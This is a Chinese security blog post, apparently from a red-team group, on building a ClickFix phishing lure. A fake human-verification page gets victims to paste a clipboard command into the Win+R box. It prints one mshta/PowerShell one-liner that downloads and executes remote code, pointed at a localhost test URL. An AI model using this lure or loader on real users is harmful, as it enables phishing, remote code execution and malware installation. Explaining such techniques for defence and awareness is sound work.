ClickFix钓鱼攻击构造

admin 2026-08-05 04:31:56 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: ClickFix钓鱼攻击是一种无文件无下载的社工攻击手法,通过伪造人机验证流程诱导受害者使用Win+R运行并粘贴恶意命令(如mshta加载PowerShell载荷),实现C2木马加载与入侵。攻击者常以钓鱼邮件为入口,利用自动化检测区分目标身份。防御建议:提高对异常验证流程的警惕,不执行来源不明的运行命令。 综合评分: 87 文章分类: 安全意识,实战经验,WEB安全,红队,社会工程学


cover_image

ClickFix钓鱼攻击构造

原创

【白】 【白】

白安全组

2026年8月4日 15:28 美国

在小说阅读器读本章

去阅读

前言

ClickFix钓鱼攻击,是一种无文件,无下载的攻击手法,主要利用社工的思路进行,针对的目标往往是非技术人员,甚至有一些会自动检测电脑上是否存在编程工具等,来分辨是否是技术人员之后再进行钓鱼,下面我们来讲讲具体实施的思路。

正文

我们先来用一张图理解一下这个钓鱼攻击的思路

本质上就是让用户进行人机验证,人机验证会引导用户win+r打开运行,然后引导用户粘贴复制的内容,其实内容是一段C2的木马加载命令,之后受害者就会被该钓鱼攻击入侵电脑。

这里我们制作一个本地的演示一下。

当我们构造了一个钓鱼邮件,让用户点击进去访问,比如我们是一个工作上的日报需要处理,当用户点击之后,就会出现这样的人机验证

这个是非常常见的一个过程,但我们点击之后,会出现让我们win+r然后粘贴

了这里我们的剪切板其实已经自动复制了一个而已代码,如下:

mshta vbscript:CreateObject("Wscript.Shell").Run("powershell -w h iex(iwr 'http://localhost:8080/p?t=W6LBS3QW'-UseB).Content",0)(window.close)

这个是我本地的测试代码,并不是真实的C2木马攻击的,这种类型的代码可以通过msf或者cs生成

我们打开之后粘贴进去

回车之后,网页就会检测黑客的c2服务器中是否接收到这个请求,接收到就会通过人机验证,然后再跳转到可能有用的正确页面。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:白安全组 【白】 【白】《ClickFix钓鱼攻击构造》

评论:0   参与:  0